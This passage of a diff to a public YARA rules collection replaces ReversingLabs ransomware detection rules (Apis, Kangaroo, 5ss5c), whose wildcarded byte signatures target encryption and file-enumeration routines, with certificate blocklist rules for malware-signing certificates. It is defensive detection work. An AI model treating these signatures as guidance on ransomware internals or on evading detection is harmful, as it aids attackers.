-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA
-        }
-		$enum_resources_2_p4 = {
-            8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CF D1 F9 51 52 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 94 34 ?? ?? ?? ??
-            66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 0F 1F 44 00 ?? 66 8B 01 83 C1 ?? 66 85
-            C0 75 ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 79 ?? 66
-            8B 01 83 C1 ?? 66 85 C0 75 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ??
-            ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 8B 94 34 ?? ?? ?? ?? 66 83 3A ?? 75 ?? 33 C9 E9
-            ?? ?? ?? ?? 8B CA 8D 79 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? E9 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? F6 84 34 ?? ?? ?? ?? ?? 74 ?? 8D
-            8C 24 ?? ?? ?? ?? 8D 53 ?? 03 CE E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 45 89 6C 24 ?? 3B
-            6C 24 ?? 0F 82 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 F6 8B 44 24 ?? 83 F8 ??
-            72 ?? 8B 4C 24 ?? 40 3D ?? ?? ?? ?? 77 ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ??
-            8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83
-            C4 ?? 5F 8B C6 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KULBYT LLC" and ( pe.signatures [ i ] . serial == "00:e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e" or pe.signatures [ i ] . serial == "e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e" ) and 1614729600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_28C57Df09Ce7Cc3Fde2243Beb4D00101 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "63e2edab-11a4-55ba-b042-c88b6d2750a5"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11920-L11936"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "84402dc0a58fca36424d8d6d13c60b80342bb3792f4e32e23878530264358726"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $encrypt_files_p* ) ) and ( $find_files ) and ( all of ( $enum_resources_1_p* ) ) and ( all of ( $enum_resources_2_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WATER, s.r.o." and pe.signatures [ i ] . serial == "28:c5:7d:f0:9c:e7:cc:3f:de:22:43:be:b4:d0:01:01" and 1622678400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Apis : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2D8Cfcf04209Dc7F771D8D18E462C35A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Apis ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "63791250-e21e-53d1-932c-9b5d16a7cad9"
-		date = "2021-11-25"
-		modified = "2021-11-25"
+		id = "5ce5c076-87de-50f0-9fa1-a3efef8dd7f8"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Apis.yara#L1-L75"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0915469884a268f124da348d6a182eb4a0f69063d4041b46628794ab011227ef"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11938-L11954"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2b784e46268d78046365400ef914d7ca673503c93962d0b0740ca2ac9faf7857"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Apis"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0A 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 2C ?? 06 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E
-            69 32 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E ?? ?? ?? ??
-            7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
-            ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ??
-            7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ??
-            ?? ?? 08 28 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11
-            ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ??
-            28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            02 28 ?? ?? ?? ?? 0A 17 0B 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 08 9A 28
-            ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 11 ?? FE 06 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 39
-            ?? ?? ?? ?? 06 08 9A 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F
-            ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 2F ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
-            18 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ??
-            28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1A 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A
-            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 2C ?? 16 0B 02 72 ?? ?? ?? ?? 7E ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 08 17 58 0C 08 06 8E
-            69 3F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ??
-            11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 2A
-        }
-		$setup_env = {
-            28 ?? ?? ?? ?? 2C ?? 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
-            ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
-            ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 2C ??
-            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ??
-            28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2D ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ??
-            80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AA PLUS INVEST d.o.o." and pe.signatures [ i ] . serial == "2d:8c:fc:f0:42:09:dc:7f:77:1d:8d:18:e4:62:c3:5a" and 1631491200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Kangaroo : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_016836311Fc39Fbb8E6F308Bb03Cc2B3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Kangaroo ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ec4342c1-adc9-5ddb-b403-83c2b1ce5899"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "2c4061e8-0b8e-5c33-a746-6557449b17ed"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Kangaroo.yara#L1-L91"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1078fb3d47ad737548419e5ee66e686f705c02fea27a58c0097446547325772c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11956-L11972"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c5f6372a207d02283840e745619e93194d954eedff7bae34aadcb645b1cb78fc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Kangaroo"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            83 EC ?? 53 55 8B 6C 24 ?? 56 57 33 FF 57 57 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 33 DB 55
-            89 5C 24 ?? 89 7C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ??
-            ?? 8D 44 24 ?? 50 8D 4C 24 ?? 51 8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 57 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
-            8B 54 24 ?? 8D 4C 24 ?? 51 57 57 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85
-            ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 50 8B 44 24 ?? 68 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? 8D 4C 24 ??
-            51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57 56 FF
-            15 ?? ?? ?? ?? 8B 54 24 ?? 57 8D 4C 24 ?? 51 57 57 6A ?? 57 52 89 44 24 ?? FF 15 ??
-            ?? ?? ?? 8B 44 24 ?? 6A ?? 68 ?? ?? ?? ?? 50 57 8B 3D ?? ?? ?? ?? FF D7 8B 54 24
-        }
-		$encrypt_files_p2 = {
-            6A ?? 8D 4C 24 ?? 51 52 8B D8 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B
-            44 24 ?? 8B 54 24 ?? 50 8D 4C 24 ?? 51 53 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 83
-            F8 ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
-            8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 54 24
-            ?? 52 8D 44 24 ?? 50 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 55 8B F8 68 ?? ?? ?? ?? 57
-            FF 15 ?? ?? ?? ?? 83 C4 ?? 57 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ??
-            ?? ?? ?? 8B C5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15
-            ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 33 FF 8B 44 24 ?? 50 FF 15
-            ?? ?? ?? ?? 89 7C 24 ?? 8B 4C 24 ?? 57 51 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 5F
-            5E 5D 8B C3 5B 83 C4 ?? C3
-        }
-		$find_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 57 56 FF 15 ?? ?? ?? ?? 8B 3D ??
-            ?? ?? ?? 33 C9 83 F8 ?? 0F 94 C1 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 4C 24
-            ?? FF D7 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 44 24
-            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90
-            8B 3D ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 8D 54 24 ?? 52 56 68 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 50 EB ?? 8D 4C 24 ?? 51 56 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 83
-            C4 ?? F6 44 24 ?? ?? 74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85
-            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D
-            94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 33 FF 33 F6 EB ?? 8D 9B
-            ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF D3 85 C0 74 ?? BF ?? ??
-            ?? ?? 83 C6 ?? 83 FE ?? 72 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D3 85 C0 75
-            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? BF ?? ?? ?? ?? 8B 44 24
-            ?? A8 ?? 75 ?? A9 ?? ?? ?? ?? 75 ?? 85 FF 75 ?? 3D ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ??
-            8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 8C
-            24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 FF 15 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D
-            C3
-        }
-		$enum_resources = {
-            55 8B EC 83 E4 ?? 83 EC ?? 8B 4D ?? 53 56 57 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5F 5E
-            5B 8B E5 5D C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 4C
-            24 ?? 8B C3 85 C9 74 ?? 8D 64 24 ?? C6 00 ?? 40 83 E9 ?? 75 ?? 8B 54 24 ?? 8D 44 24
-            ?? 50 53 8D 4C 24 ?? 51 52 E8 ?? ?? ?? ?? 85 C0 75 ?? 33 FF 39 7C 24 ?? 76 ?? 8D 73
-            ?? 8D 49 ?? 83 7E ?? ?? 75 ?? 8B 06 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4E ?? 83 E1 ?? 80
-            F9 ?? 75 ?? 8D 56 ?? 52 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72 ?? EB ?? 3D ?? ??
-            ?? ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ??
-            5B 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SERVICE STREAM LIMITED" and pe.signatures [ i ] . serial == "01:68:36:31:1f:c3:9f:bb:8e:6f:30:8b:b0:3c:c2:b3" and 1602547200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_5Ss5C : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_435Abf46053A0A445C54217A8C233A7F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects 5ss5c ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c69f44de-8e48-518d-87bf-d21d11223a2f"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "538d7405-be17-519e-beb5-fbef3beaedd3"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.5ss5c.yara#L1-L267"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "74fcec568906a01dade7091c63cffbe4afa49c4705d9c1f21d10b4eee655a805"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11974-L11990"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "839f55e8fe7a86aad406e657fdef48925543b5d3884927104fd3786444a8fccc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "5ss5c"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 89 BD ?? ?? ?? ?? 8B F1
-            8B 5D ?? 33 C0 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 6A ?? 89 45 ??
-            89 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
-            57 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D
-            ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? C7 00 ?? ?? ?? ?? C7 40 ??
-            ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6
-            45 ?? ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? C7
-            00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 57 C0 8B 43 ?? 66 0F D6
-        }
-		$find_files_p2 = {
-            45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C6 45
-            ?? ?? 8B 3B 85 FF 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8B 47 ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 47 ?? 89 7D ?? E8 ?? ?? ?? ?? 6A
-            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 3B
-            C8 74 ?? 83 78 ?? ?? 8D 48 ?? 72 ?? 8B 09 FF 70 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51
-            50 FF 15 ?? ?? ?? ?? 8B C8 89 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8B D8 66 66
-            0F 1F 84 00 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
-            8B 8D ?? ?? ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C6 00 ?? 8D 41 ?? 83 79 ?? ?? 72
-            ?? 8B 00 FF 71 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 8B D0 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 8D 85 ?? ?? ?? ?? 51
-            50 8B CA E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 F6 85 ??
-            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 FF FF B7 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 81 FF ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ??
-            ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 83 CB ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 50 89 9D ?? ?? ?? ?? 89 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
-        }
-		$find_files_p3 = {
-            45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75
